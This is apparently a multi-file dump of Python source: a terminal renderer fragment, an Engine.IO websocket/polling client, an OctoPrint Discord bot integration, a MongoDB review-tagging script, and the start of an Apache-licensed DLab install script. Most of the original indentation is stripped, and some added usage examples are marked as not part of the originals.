app.style_transformation.invalidation_hash() != self._last_transformation_hash or
app.color_depth != self._last_color_depth):
self._last_screen = None
self._attrs_for_style = None
if self._attrs_for_style is None:
self._attrs_for_style = _StyleStringToAttrsCache(
self.style.get_attrs_for_style_str,
app.style_transformation)
self._last_style_hash = self.style.invalidation_hash()
self._last_transformation_hash = app.style_transformation.invalidation_hash()
self._last_color_depth = app.color_depth
layout.container.write_to_screen(screen, mouse_handlers, WritePosition(
xpos=0,
ypos=0,
width=size.columns,
height=height,
), parent_style='', erase_bg=False, z_index=None)
screen.draw_all_floats()
# When grayed. Replace all styles in the new screen.
if app.exit_style:
screen.append_style_to_content(app.exit_style)
# Process diff and write to output.
self._cursor_pos, self._last_style = _output_screen_diff(
app, output, screen, self._cursor_pos, app.color_depth,
self._last_screen, self._last_style, is_done,
full_screen=self.full_screen,
attrs_for_style_string=self._attrs_for_style, size=size,
previous_width=(self._last_size.columns if self._last_size else 0))
self._last_screen = screen
self._last_size = size
self.mouse_handlers = mouse_handlers
output.flush()
# Set visible windows in layout.
app.layout.visible_windows = screen.visible_windows
if is_done:
self.reset()
def erase(self, leave_alternate_screen=True):
"""
Hide all output and put the cursor back at the first line. This is for
instance used for running a system command (while hiding the CLI) and
later resuming the same CLI.)
:param leave_alternate_screen: When True, and when inside an alternate
screen buffer, quit the alternate screen.
"""
output = self.output
output.cursor_backward(self._cursor_pos.x)
output.cursor_up(self._cursor_pos.y)
output.erase_down()
output.reset_attributes()
output.enable_autowrap()
output.flush()
self.reset(leave_alternate_screen=leave_alternate_screen)
def clear(self):
"""
Clear screen and go to 0,0
"""
# Erase current output first.
self.erase()
# Send "Erase Screen" command and go to (0, 0).
output = self.output
output.erase_screen()
output.cursor_goto(0, 0)
output.flush()
self.request_absolute_cursor_position()
def print_formatted_text(
output, formatted_text, style, style_transformation=None,
color_depth=None):
"""
Print a list of (style_str, text) tuples in the given style to the output.
"""
assert isinstance(output, Output)
assert isinstance(style, BaseStyle)
assert style_transformation is None or isinstance(style_transformation, StyleTransformation)
assert color_depth is None or color_depth in ColorDepth._ALL
fragments = to_formatted_text(formatted_text)
style_transformation = style_transformation or DummyStyleTransformation()
color_depth = color_depth or ColorDepth.default()
# Reset first.
output.reset_attributes()
output.enable_autowrap()
# Print all (style_str, text) tuples.
attrs_for_style_string = _StyleStringToAttrsCache(
style.get_attrs_for_style_str,
style_transformation)
for style_str, text in fragments:
attrs = attrs_for_style_string[style_str]
if attrs:
output.set_attributes(attrs, color_depth)
else:
output.reset_attributes()
# Assume that the output is raw, and insert a carriage return before
# every newline. (Also important when the front-end is a telnet client.)
assert '\r' not in text
output.write(text.replace('\n', '\r\n'))
# Reset again.
output.reset_attributes()
output.flush()
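# --- Hedged usage sketch (not part of the original module) -----------------
# Minimal example of calling print_formatted_text() directly.  It assumes this
# renderer lives alongside prompt_toolkit-style helpers; create_output,
# Style.from_dict and FormattedText below are assumptions about that
# surrounding package, not names defined in this file.
if __name__ == '__main__':
    from prompt_toolkit.formatted_text import FormattedText
    from prompt_toolkit.output.defaults import create_output
    from prompt_toolkit.styles import Style

    demo_output = create_output()            # Output wrapping the current stdout
    demo_style = Style.from_dict({'greeting': 'ansigreen bold'})
    demo_fragments = FormattedText([
        ('class:greeting', 'hello'),          # styled fragment
        ('', ' world\n'),                     # unstyled fragment
    ])
    # Writes the fragments with their attributes, then resets and flushes.
    print_formatted_text(demo_output, demo_fragments, demo_style)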
|
client.py
|
from base64 import b64encode
import logging
try:
import queue
except ImportError: # pragma: no cover
import Queue as queue
import signal
import ssl
import threading
import time
import six
from six.moves import urllib
try:
import requests
except ImportError: # pragma: no cover
requests = None
try:
import websocket
except ImportError: # pragma: no cover
websocket = None
from . import exceptions
from . import packet
from . import payload
default_logger = logging.getLogger('engineio.client')
connected_clients = []
if six.PY2: # pragma: no cover
ConnectionError = OSError
def signal_handler(sig, frame):
"""SIGINT handler.
Disconnect all active clients and then invoke the original signal handler.
"""
for client in connected_clients[:]:
if not client.is_asyncio_based():
client.disconnect()
if callable(original_signal_handler):
return original_signal_handler(sig, frame)
else: # pragma: no cover
# Handle case where no original SIGINT handler was present.
return signal.default_int_handler(sig, frame)
original_signal_handler = None
class Client(object):
"""An Engine.IO client.
This class implements a fully compliant Engine.IO web client with support
for websocket and long-polling transports.
:param logger: To enable logging set to ``True`` or pass a logger object to
use. To disable logging set to ``False``. The default is
``False``. Note that fatal errors are logged even when
``logger`` is ``False``.
:param json: An alternative json module to use for encoding and decoding
packets. Custom json modules must have ``dumps`` and ``loads``
functions that are compatible with the standard library
versions.
:param request_timeout: A timeout in seconds for requests. The default is
5 seconds.
:param http_session: an initialized ``requests.Session`` object to be used
when sending requests to the server. Use it if you
need to add special client options such as proxy
servers, SSL certificates, etc.
:param ssl_verify: ``True`` to verify SSL certificates, or ``False`` to
skip SSL certificate verification, allowing
connections to servers with self signed certificates.
The default is ``True``.
"""
event_names = ['connect', 'disconnect', 'message']
def __init__(self,
logger=False,
json=None,
request_timeout=5,
http_session=None,
ssl_verify=True):
global original_signal_handler
if original_signal_handler is None and \
threading.current_thread() == threading.main_thread():
original_signal_handler = signal.signal(signal.SIGINT,
signal_handler)
self.handlers = {}
self.base_url = None
self.transports = None
self.current_transport = None
self.sid = None
self.upgrades = None
self.ping_interval = None
self.ping_timeout = None
self.pong_received = True
self.http = http_session
self.ws = None
self.read_loop_task = None
self.write_loop_task = None
self.ping_loop_task = None
self.ping_loop_event = None
self.queue = None
self.state = 'disconnected'
self.ssl_verify = ssl_verify
if json is not None:
packet.Packet.json = json
if not isinstance(logger, bool):
self.logger = logger
else:
self.logger = default_logger
if not logging.root.handlers and \
self.logger.level == logging.NOTSET:
if logger:
self.logger.setLevel(logging.INFO)
else:
self.logger.setLevel(logging.ERROR)
self.logger.addHandler(logging.StreamHandler())
self.request_timeout = request_timeout
def is_asyncio_based(self):
return False
def on(self, event, handler=None):
"""Register an event handler.
:param event: The event name. Can be ``'connect'``, ``'message'`` or
``'disconnect'``.
:param handler: The function that should be invoked to handle the
event. When this parameter is not given, the method
acts as a decorator for the handler function.
Example usage::
# as a decorator:
@eio.on('connect')
def connect_handler():
print('Connection request')
# as a method:
def message_handler(msg):
print('Received message: ', msg)
eio.send('response')
eio.on('message', message_handler)
"""
if event not in self.event_names:
raise ValueError('Invalid event')
def set_handler(handler):
self.handlers[event] = handler
return handler
if handler is None:
return set_handler
set_handler(handler)
def connect(self, url, headers=None, transports=None,
engineio_path='engine.io'):
"""Connect to an Engine.IO server.
:param url: The URL of the Engine.IO server. It can include custom
query string parameters if required by the server.
:param headers: A dictionary with custom headers to send with the
connection request.
:param transports: The list of allowed transports. Valid transports
are ``'polling'`` and ``'websocket'``. If not
given, the polling transport is connected first,
then an upgrade to websocket is attempted.
:param engineio_path: The endpoint where the Engine.IO server is
installed. The default value is appropriate for
most cases.
Example usage::
eio = engineio.Client()
eio.connect('http://localhost:5000')
"""
if self.state != 'disconnected':
raise ValueError('Client is not in a disconnected state')
valid_transports = ['polling', 'websocket']
if transports is not None:
if isinstance(transports, six.string_types):
transports = [transports]
transports = [transport for transport in transports
if transport in valid_transports]
if not transports:
raise ValueError('No valid transports provided')
self.transports = transports or valid_transports
self.queue = self.create_queue()
return getattr(self, '_connect_' + self.transports[0])(
url, headers or {}, engineio_path)
def wait(self):
"""Wait until the connection with the server ends.
Client applications can use this function to block the main thread
during the life of the connection.
"""
if self.read_loop_task:
self.read_loop_task.join()
def send(self, data, binary=None):
"""Send a message to a client.
:param data: The data to send to the client. Data can be of type
``str``, ``bytes``, ``list`` or ``dict``. If a ``list``
or ``dict``, the data will be serialized as JSON.
:param binary: ``True`` to send packet as binary, ``False`` to send
as text. If not given, unicode (Python 2) and str
(Python 3) are sent as text, and str (Python 2) and
bytes (Python 3) are sent as binary.
"""
self._send_packet(packet.Packet(packet.MESSAGE, data=data,
binary=binary))
def disconnect(self, abort=False):
"""Disconnect from the server.
:param abort: If set to ``True``, do not wait for background tasks
associated with the connection to end.
"""
if self.state == 'connected':
self._send_packet(packet.Packet(packet.CLOSE))
self.queue.put(None)
self.state = 'disconnecting'
self._trigger_event('disconnect', run_async=False)
if self.current_transport == 'websocket':
self.ws.close()
if not abort:
self.read_loop_task.join()
self.state = 'disconnected'
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
def transport(self):
"""Return the name of the transport currently in use.
The possible values returned by this function are ``'polling'`` and
``'websocket'``.
"""
return self.current_transport
def start_background_task(self, target, *args, **kwargs):
"""Start a background task.
This is a utility function that applications can use to start a
background task.
:param target: the target function to execute.
:param args: arguments to pass to the function.
:param kwargs: keyword arguments to pass to the function.
This function returns an object compatible with the `Thread` class in
the Python standard library. The `start()` method on this object is
already called by this function.
"""
th = threading.Thread(target=target, args=args, kwargs=kwargs)
th.start()
return th
def sleep(self, seconds=0):
"""Sleep for the requested amount of time."""
return time.sleep(seconds)
def create_queue(self, *args, **kwargs):
"""Create a queue object."""
q = queue.Queue(*args, **kwargs)
q.Empty = queue.Empty
return q
def create_event(self, *args, **kwargs):
"""Create an event object."""
return threading.Event(*args, **kwargs)
def _reset(self):
self.state = 'disconnected'
self.sid = None
def _connect_polling(self, url, headers, engineio_path):
"""Establish a long-polling connection to the Engine.IO server."""
if requests is None: # pragma: no cover
# not installed
self.logger.error('requests package is not installed -- cannot '
'send HTTP requests!')
return
self.base_url = self._get_engineio_url(url, engineio_path, 'polling')
self.logger.info('Attempting polling connection to ' + self.base_url)
r = self._send_request(
'GET', self.base_url + self._get_url_timestamp(), headers=headers,
timeout=self.request_timeout)
if r is None:
self._reset()
raise exceptions.ConnectionError(
'Connection refused by the server')
if r.status_code < 200 or r.status_code >= 300:
self._reset()
raise exceptions.ConnectionError(
'Unexpected status code {} in server response'.format(
r.status_code), r.json())
try:
p = payload.Payload(encoded_payload=r.content)
except ValueError:
six.raise_from(exceptions.ConnectionError(
'Unexpected response from server'), None)
open_packet = p.packets[0]
if open_packet.packet_type != packet.OPEN:
raise exceptions.ConnectionError(
'OPEN packet not returned by server')
self.logger.info(
'Polling connection accepted with ' + str(open_packet.data))
self.sid = open_packet.data['sid']
self.upgrades = open_packet.data['upgrades']
self.ping_interval = open_packet.data['pingInterval'] / 1000.0
self.ping_timeout = open_packet.data['pingTimeout'] / 1000.0
self.current_transport = 'polling'
self.base_url += '&sid=' + self.sid
self.state = 'connected'
connected_clients.append(self)
self._trigger_event('connect', run_async=False)
for pkt in p.packets[1:]:
self._receive_packet(pkt)
if 'websocket' in self.upgrades and 'websocket' in self.transports:
# attempt to upgrade to websocket
if self._connect_websocket(url, headers, engineio_path):
# upgrade to websocket succeeded, we're done here
return
# start background tasks associated with this client
self.ping_loop_task = self.start_background_task(self._ping_loop)
self.write_loop_task = self.start_background_task(self._write_loop)
self.read_loop_task = self.start_background_task(
self._read_loop_polling)
def _connect_websocket(self, url, headers, engineio_path):
"""Establish or upgrade to a WebSocket connection with the server."""
if websocket is None: # pragma: no cover
# not installed
self.logger.warning('websocket-client package not installed, only '
'polling transport is available')
return False
websocket_url = self._get_engineio_url(url, engineio_path, 'websocket')
if self.sid:
self.logger.info(
'Attempting WebSocket upgrade to ' + websocket_url)
upgrade = True
websocket_url += '&sid=' + self.sid
else:
upgrade = False
self.base_url = websocket_url
self.logger.info(
'Attempting WebSocket connection to ' + websocket_url)
# get cookies and other settings from the long-polling connection
# so that they are preserved when connecting to the WebSocket route
cookies = None
extra_options = {}
if self.http:
# cookies
cookies = '; '.join(["{}={}".format(cookie.name, cookie.value)
for cookie in self.http.cookies])
for header, value in headers.items():
if header.lower() == 'cookie':
if cookies:
cookies += '; '
cookies += value
del headers[header]
break
# auth
if 'Authorization' not in headers and self.http.auth is not None:
if not isinstance(self.http.auth, tuple): # pragma: no cover
raise ValueError('Only basic authentication is supported')
basic_auth = '{}:{}'.format(
self.http.auth[0], self.http.auth[1]).encode('utf-8')
basic_auth = b64encode(basic_auth).decode('utf-8')
headers['Authorization'] = 'Basic ' + basic_auth
# cert
# this can be given as ('certfile', 'keyfile') or just 'certfile'
if isinstance(self.http.cert, tuple):
extra_options['sslopt'] = {
'certfile': self.http.cert[0],
'keyfile': self.http.cert[1]}
elif self.http.cert:
extra_options['sslopt'] = {'certfile': self.http.cert}
# proxies
if self.http.proxies:
proxy_url = None
if websocket_url.startswith('ws://'):
proxy_url = self.http.proxies.get(
'ws', self.http.proxies.get('http'))
else: # wss://
proxy_url = self.http.proxies.get(
'wss', self.http.proxies.get('https'))
if proxy_url:
parsed_url = urllib.parse.urlparse(
proxy_url if '://' in proxy_url
else 'scheme://' + proxy_url)
extra_options['http_proxy_host'] = parsed_url.hostname
extra_options['http_proxy_port'] = parsed_url.port
extra_options['http_proxy_auth'] = (
(parsed_url.username, parsed_url.password)
if parsed_url.username or parsed_url.password
else None)
# verify
if not self.http.verify:
self.ssl_verify = False
if not self.ssl_verify:
extra_options['sslopt'] = {"cert_reqs": ssl.CERT_NONE}
try:
ws = websocket.create_connection(
websocket_url + self._get_url_timestamp(), header=headers,
cookie=cookies, enable_multithread=True, **extra_options)
except (ConnectionError, IOError, websocket.WebSocketException):
if upgrade:
self.logger.warning(
'WebSocket upgrade failed: connection error')
return False
else:
raise exceptions.ConnectionError('Connection error')
if upgrade:
p = packet.Packet(packet.PING,
data=six.text_type('probe')).encode()
try:
ws.send(p)
except Exception as e: # pragma: no cover
self.logger.warning(
'WebSocket upgrade failed: unexpected send exception: %s',
str(e))
return False
try:
p = ws.recv()
except Exception as e: # pragma: no cover
self.logger.warning(
'WebSocket upgrade failed: unexpected recv exception: %s',
str(e))
return False
pkt = packet.Packet(encoded_packet=p)
if pkt.packet_type != packet.PONG or pkt.data != 'probe':
self.logger.warning(
'WebSocket upgrade failed: no PONG packet')
return False
p = packet.Packet(packet.UPGRADE).encode()
try:
ws.send(p)
except Exception as e: # pragma: no cover
self.logger.warning(
'WebSocket upgrade failed: unexpected send exception: %s',
str(e))
return False
self.current_transport = 'websocket'
self.logger.info('WebSocket upgrade was successful')
else:
try:
p = ws.recv()
except Exception as e: # pragma: no cover
raise exceptions.ConnectionError(
'Unexpected recv exception: ' + str(e))
open_packet = packet.Packet(encoded_packet=p)
if open_packet.packet_type != packet.OPEN:
raise exceptions.ConnectionError('no OPEN packet')
self.logger.info(
'WebSocket connection accepted with ' + str(open_packet.data))
self.sid = open_packet.data['sid']
self.upgrades = open_packet.data['upgrades']
self.ping_interval = open_packet.data['pingInterval'] / 1000.0
self.ping_timeout = open_packet.data['pingTimeout'] / 1000.0
self.current_transport = 'websocket'
self.state = 'connected'
connected_clients.append(self)
self._trigger_event('connect', run_async=False)
self.ws = ws
# start background tasks associated with this client
self.ping_loop_task = self.start_background_task(self._ping_loop)
self.write_loop_task = self.start_background_task(self._write_loop)
self.read_loop_task = self.start_background_task(
self._read_loop_websocket)
return True
def _receive_packet(self, pkt):
"""Handle incoming packets from the server."""
packet_name = packet.packet_names[pkt.packet_type] \
if pkt.packet_type < len(packet.packet_names) else 'UNKNOWN'
self.logger.info(
'Received packet %s data %s', packet_name,
pkt.data if not isinstance(pkt.data, bytes) else '<binary>')
if pkt.packet_type == packet.MESSAGE:
self._trigger_event('message', pkt.data, run_async=True)
elif pkt.packet_type == packet.PONG:
self.pong_received = True
elif pkt.packet_type == packet.CLOSE:
self.disconnect(abort=True)
elif pkt.packet_type == packet.NOOP:
pass
else:
self.logger.error('Received unexpected packet of type %s',
pkt.packet_type)
def _send_packet(self, pkt):
"""Queue a packet to be sent to the server."""
if self.state != 'connected':
return
self.queue.put(pkt)
self.logger.info(
'Sending packet %s data %s',
packet.packet_names[pkt.packet_type],
pkt.data if not isinstance(pkt.data, bytes) else '<binary>')
def _send_request(
self, method, url, headers=None, body=None,
timeout=None): # pragma: no cover
if self.http is None:
self.http = requests.Session()
try:
return self.http.request(method, url, headers=headers, data=body,
timeout=timeout, verify=self.ssl_verify)
except requests.exceptions.RequestException as exc:
self.logger.info('HTTP %s request to %s failed with error %s.',
method, url, exc)
def _trigger_event(self, event, *args, **kwargs):
"""Invoke an event handler."""
run_async = kwargs.pop('run_async', False)
if event in self.handlers:
if run_async:
return self.start_background_task(self.handlers[event], *args)
else:
try:
return self.handlers[event](*args)
except:
self.logger.exception(event + ' handler error')
def _get_engineio_url(self, url, engineio_path, transport):
"""Generate the Engine.IO connection URL."""
engineio_path = engineio_path.strip('/')
parsed_url = urllib.parse.urlparse(url)
if transport == 'polling':
scheme = 'http'
elif transport == 'websocket':
scheme = 'ws'
else: # pragma: no cover
raise ValueError('invalid transport')
if parsed_url.scheme in ['https', 'wss']:
scheme += 's'
return ('{scheme}://{netloc}/{path}/?{query}'
'{sep}transport={transport}&EIO=3').format(
scheme=scheme, netloc=parsed_url.netloc,
path=engineio_path, query=parsed_url.query,
sep='&' if parsed_url.query else '',
transport=transport)
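# Worked example of the URL assembled above (illustrative values):
#   _get_engineio_url('http://localhost:5000', 'engine.io', 'polling')
#     -> 'http://localhost:5000/engine.io/?transport=polling&EIO=3'
# An existing query string is preserved and joined with '&', and https/wss
# inputs keep the secure scheme:
#   _get_engineio_url('https://example.com/?token=abc', 'engine.io', 'websocket')
#     -> 'wss://example.com/engine.io/?token=abc&transport=websocket&EIO=3'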
def _get_url_timestamp(self):
"""Generate the Engine.IO query string timestamp."""
return '&t=' + str(time.time())
def _ping_loop(self):
"""This background task sends a PING to the server at the requested
interval.
"""
self.pong_received = True
if self.ping_loop_event is None:
self.ping_loop_event = self.create_event()
else:
self.ping_loop_event.clear()
while self.state == 'connected':
if not self.pong_received:
self.logger.info(
'PONG response has not been received, aborting')
if self.ws:
self.ws.close(timeout=0)
self.queue.put(None)
break
self.pong_received = False
self._send_packet(packet.Packet(packet.PING))
self.ping_loop_event.wait(timeout=self.ping_interval)
self.logger.info('Exiting ping task')
def _read_loop_polling(self):
"""Read packets by polling the Engine.IO server."""
while self.state == 'connected':
self.logger.info(
'Sending polling GET request to ' + self.base_url)
r = self._send_request(
'GET', self.base_url + self._get_url_timestamp(),
timeout=max(self.ping_interval, self.ping_timeout) + 5)
if r is None:
self.logger.warning(
'Connection refused by the server, aborting')
self.queue.put(None)
break
if r.status_code < 200 or r.status_code >= 300:
self.logger.warning('Unexpected status code %s in server '
'response, aborting', r.status_code)
self.queue.put(None)
break
try:
p = payload.Payload(encoded_payload=r.content)
except ValueError:
self.logger.warning(
'Unexpected packet from server, aborting')
self.queue.put(None)
break
for pkt in p.packets:
self._receive_packet(pkt)
self.logger.info('Waiting for write loop task to end')
self.write_loop_task.join()
self.logger.info('Waiting for ping loop task to end')
if self.ping_loop_event: # pragma: no cover
self.ping_loop_event.set()
self.ping_loop_task.join()
if self.state == 'connected':
self._trigger_event('disconnect', run_async=False)
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
self.logger.info('Exiting read loop task')
def _read_loop_websocket(self):
"""Read packets from the Engine.IO WebSocket connection."""
while self.state == 'connected':
p = None
try:
p = self.ws.recv()
except websocket.WebSocketConnectionClosedException:
self.logger.warning(
'WebSocket connection was closed, aborting')
self.queue.put(None)
break
except Exception as e:
self.logger.info(
'Unexpected error receiving packet: "%s", aborting',
str(e))
self.queue.put(None)
break
if isinstance(p, six.text_type): # pragma: no cover
p = p.encode('utf-8')
try:
pkt = packet.Packet(encoded_packet=p)
except Exception as e: # pragma: no cover
self.logger.info(
'Unexpected error decoding packet: "%s", aborting', str(e))
self.queue.put(None)
break
self._receive_packet(pkt)
self.logger.info('Waiting for write loop task to end')
self.write_loop_task.join()
self.logger.info('Waiting for ping loop task to end')
if self.ping_loop_event: # pragma: no cover
self.ping_loop_event.set()
self.ping_loop_task.join()
if self.state == 'connected':
self._trigger_event('disconnect', run_async=False)
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
self.logger.info('Exiting read loop task')
def _write_loop(self):
"""This background task sends packages to the server as they are
pushed to the send queue.
"""
while self.state == 'connected':
# to simplify the timeout handling, use the maximum of the
# ping interval and ping timeout as timeout, with an extra 5
# seconds grace period
timeout = max(self.ping_interval, self.ping_timeout) + 5
packets = None
try:
packets = [self.queue.get(timeout=timeout)]
except self.queue.Empty:
self.logger.error('packet queue is empty, aborting')
break
if packets == [None]:
self.queue.task_done()
packets = []
else:
while True:
try:
packets.append(self.queue.get(block=False))
except self.queue.Empty:
break
if packets[-1] is None:
packets = packets[:-1]
self.queue.task_done()
break
if not packets:
# empty packet list returned -> connection closed
break
if self.current_transport == 'polling':
p = payload.Payload(packets=packets)
r = self._send_request(
'POST', self.base_url, body=p.encode(),
headers={'Content-Type': 'application/octet-stream'},
timeout=self.request_timeout)
for pkt in packets:
self.queue.task_done()
if r is None:
self.logger.warning(
'Connection refused by the server, aborting')
break
if r.status_code < 200 or r.status_code >= 300:
self.logger.warning('Unexpected status code %s in server '
'response, aborting', r.status_code)
self._reset()
break
else:
# websocket
try:
for pkt in packets:
encoded_packet = pkt.encode(always_bytes=False)
if pkt.binary:
self.ws.send_binary(encoded_packet)
else:
self.ws.send(encoded_packet)
self.queue.task_done()
except websocket.WebSocketConnectionClosedException:
self.logger.warning(
'WebSocket connection was closed, aborting')
break
self.logger.info('Exiting write loop task')
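# --- Hedged usage sketch (not part of the library) --------------------------
# Minimal end-to-end use of the Client above, pieced together from the
# docstrings in this module.  The URL is a placeholder; an Engine.IO server
# must actually be listening there for the connection to succeed.
if __name__ == '__main__':
    eio = Client(logger=True)

    @eio.on('connect')
    def on_connect():
        print('connected, sid =', eio.sid)
        eio.send('hello from the client')

    @eio.on('message')
    def on_message(data):
        print('received:', data)

    @eio.on('disconnect')
    def on_disconnect():
        print('disconnected from server')

    eio.connect('http://localhost:5000')   # placeholder server address
    eio.wait()                             # block until the connection ends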
|
discordimpl.py
|
# coding: utf-8
# Simple module to send messages through a Discord WebHook
# post a message to discord api via a bot
# bot must be added to the server and have write access to the channel
import asyncio
from asyncio import Event
import re
import time
from threading import Thread
from typing import Optional, Tuple, List
from unittest.mock import Mock
import discord
from discord.embeds import Embed
from discord.file import File
from octoprint_discordremote import Command
# Constants
CHANNEL_ID_LENGTH = 18
BOT_TOKEN_LENGTH = 59
class DiscordImpl:
class AsyncIOEventWrapper:
def __init__(self, event: Optional[Event] = None):
self.set_state = False
self.event = event
def set_event(self, event: Optional[Event]):
self.event = event
if self.set_state:
self.event.set()
else:
self.event.clear()
def is_set(self) -> bool:
if self.event is None:
return self.set_state
return self.event.is_set()
async def wait(self):
while self.event is None:
await asyncio.sleep(1)
await self.event.wait()
def set(self):
if self.event:
self.event.set()
else:
self.set_state = True
def clear(self):
if self.event:
self.event.clear()
else:
self.set_state = False
def __init__(self):
self.logger = None
self.channel_id: int = 0 # enable dev mode on discord, right-click on the channel, copy ID
self.bot_token: str = "" # get from the bot page. must be a bot, not a discord app
self.loop = None
self.client: Optional[discord.Client] = None
self.running_thread: Optional[Thread] = None
self.command: Optional[Command] = None
self.shutdown_event: DiscordImpl.AsyncIOEventWrapper = DiscordImpl.AsyncIOEventWrapper(None)
self.message_queue: List[List[Tuple[Embed, File]]] = []
self.thread: Optional[Thread] = None
self.process_queue: DiscordImpl.AsyncIOEventWrapper = DiscordImpl.AsyncIOEventWrapper(None)
def configure_discord(self, bot_token: str, channel_id: str, logger, command: Command, status_callback=None):
self.bot_token = bot_token
self.channel_id = int(channel_id)
if logger:
self.logger = logger
self.command = command
if len(str(self.channel_id)) != CHANNEL_ID_LENGTH:
self.logger.error("Incorrectly configured: Channel ID must be %d chars long." % CHANNEL_ID_LENGTH)
return
if self.bot_token is None or len(self.bot_token) != BOT_TOKEN_LENGTH:
self.logger.error("Incorrectly configured: Bot Token must be %d chars long." % BOT_TOKEN_LENGTH)
return
self.thread = Thread(target=self.run_thread)
self.thread.start()
while self.loop is None:
time.sleep(0.1)
def run_thread(self):
asyncio.set_event_loop(asyncio.new_event_loop())
loop = asyncio.get_event_loop()
loop.add_signal_handler = Mock()
self.client = discord.Client()
@self.client.event
async def on_message(message):
await self.handle_message(message)
@self.client.event
async def on_ready():
self.logger.info("Sending msgs")
asyncio.create_task(self.process_message_queue())
try:
self.loop = asyncio.get_event_loop()
# Create proper events now that we have an event loop.
self.shutdown_event.set_event(Event())
self.process_queue.set_event(Event())
future = self.client.run(self.bot_token)
self.loop.run_until_complete(asyncio.wait([future]))
except RuntimeError as e:
self.logger.info("Failed with: %s" % e)
except Exception as e:
self.logger.error("Failed with: %s" % e)
def update_presence(self, msg):
try:
if self.client.ws:
self.loop.create_task(
self.client.change_presence(activity=discord.Activity(url='http://octoprint.url', name=msg)))
except:
pass
async def send_messages(self):
try:
while len(self.message_queue):
message_pairs = self.message_queue[0]
channel = self.client.get_channel(int(self.channel_id))
for embed, snapshot in message_pairs:
await channel.send(embed=embed, file=snapshot)
del self.message_queue[0]
if len(self.message_queue) == 0:
self.process_queue.clear()
except Exception as e:
self.logger.error("Failed with: %s" % e)
async def process_message_queue(self):
while not self.shutdown_event.is_set():
await self.send_messages()
if len(self.message_queue) != 0:
await asyncio.sleep(10)
continue
await self.process_queue.wait()
def send(self, messages: List[Tuple[Optional[Embed], Optional[File]]]):
self.message_queue.append(messages)
self.process_queue.set()
def log_safe(self, message):
return message.replace(self.bot_token, "[bot_token]").replace(str(self.channel_id), "[channel_id]")
async def handle_message(self, message):
if message.channel.id != self.channel_id:
# Only care about messages from correct channel
return
self.logger.debug("Message is: %s" % message)
user = message.author.id
if user == self.client.user.id:
# Don't respond to ourself.
return
if message.author.bot:
# Don't respond to bots.
return
for upload in message.attachments:
filename = upload.filename
url = upload.url
if re.match(r"^[\w,\s-]+\.(?:g|gco|gcode|zip(?:\.[\d]*)?)$", filename):
messages = self.command.download_file(filename, url, user)
self.send(messages)
if len(message.content) > 0:
messages = self.command.parse_command(message.content, user)
self.send(messages)
def shutdown_discord(self):
self.shutdown_event.set()
self.process_queue.set()
if self.loop:
self.loop.stop()
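# --- Hedged usage sketch (not part of the plugin) ----------------------------
# How this class is wired up, based only on configure_discord()/send() above.
# The token and channel id are placeholders of the expected lengths, and the
# Command is replaced with a Mock; a real bot token, channel id and
# octoprint_discordremote Command are required for anything to reach Discord.
if __name__ == '__main__':
    import logging

    logging.basicConfig(level=logging.INFO)
    demo_logger = logging.getLogger('discordimpl-demo')

    bot = DiscordImpl()
    bot.configure_discord(
        bot_token='x' * BOT_TOKEN_LENGTH,      # placeholder, not a real token
        channel_id='1' * CHANNEL_ID_LENGTH,    # placeholder channel id
        logger=demo_logger,
        command=Mock(spec=Command))            # stand-in for the plugin Command
    # Queue a single embed-only message (no file attachment) for the channel.
    bot.send([(Embed(title='Print started'), None)])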
|
reviews_parallel.py
|
import multiprocessing
import time
import sys
import nltk
from pymongo import MongoClient
from settings import Settings
def load_stopwords():
stopwords = {}
with open('stopwords.txt', 'rU') as f:
for line in f:
stopwords[line.strip()] = 1
return stopwords
def worker(identifier, skip, count):
done = 0
start = time.time()
stopwords = load_stopwords()
reviews_collection = MongoClient(Settings.MONGO_CONNECTION_STRING)[Settings.REVIEWS_DATABASE][
Settings.REVIEWS_COLLECTION]
tags_collection = MongoClient(Settings.MONGO_CONNECTION_STRING)[Settings.TAGS_DATABASE][
Settings.REVIEWS_COLLECTION]
batch_size = 50
for batch in range(0, count, batch_size):
reviews_cursor = reviews_collection.find().skip(skip + batch).limit(batch_size)
for review in reviews_cursor:
words = []
sentences = nltk.sent_tokenize(review["text"].lower())
for sentence in sentences:
tokens = nltk.word_tokenize(sentence)
text = [word for word in tokens if word not in stopwords]
tagged_text = nltk.pos_tag(text)
for word, tag in tagged_text:
words.append({"word": word, "pos": tag})
tags_collection.insert({
"reviewId": review["reviewId"],
"business": review["business"],
"text": review["text"],
"words": words
})
done += 1
if done % 100 == 0:
end = time.time()
print 'Worker' + str(identifier) + ': Done ' + str(done) + ' out of ' + str(count) + ' in ' + (
"%.2f" % (end - start)) + ' sec ~ ' + ("%.2f" % (done / (end - start))) + '/sec'
sys.stdout.flush()
def main():
reviews_collection = MongoClient(Settings.MONGO_CONNECTION_STRING)[Settings.REVIEWS_DATABASE][
Settings.REVIEWS_COLLECTION]
reviews_cursor = reviews_collection.find()
count = reviews_cursor.count()
workers = 3
batch = count / workers
left = count % workers
jobs = []
for i in range(workers):
size = count / workers
if i == (workers - 1):
size += left
p = multiprocessing.Process(target=worker, args=((i + 1), i * batch, size))
jobs.append(p)
p.start()
for j in jobs:
j.join()
print '%s.exitcode = %s' % (j.name, j.exitcode)
if __name__ == '__main__':
main()
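# Worked example of the work split in main() (illustrative numbers):
#   count = 10 reviews, workers = 3
#   batch = 10 / 3 = 3 (integer division), left = 10 % 3 = 1
#   worker 1: skip = 0, size = 3
#   worker 2: skip = 3, size = 3
#   worker 3: skip = 6, size = 3 + 1 = 4   (the last worker absorbs the remainder)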
|
dataengine-service_install_libs.py
|
#!/usr/bin/python
# *****************************************************************************
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# ******************************************************************************
import os
import sys
import logging
import traceback
from dlab.fab import *
from dlab.meta_lib import *
from dlab.actions_lib import *
from fabric.api import *
import multiprocessing
def install_libs(instance, data_engine):
data_engine['instance_ip'] = instance.get('PrivateIpAddress')
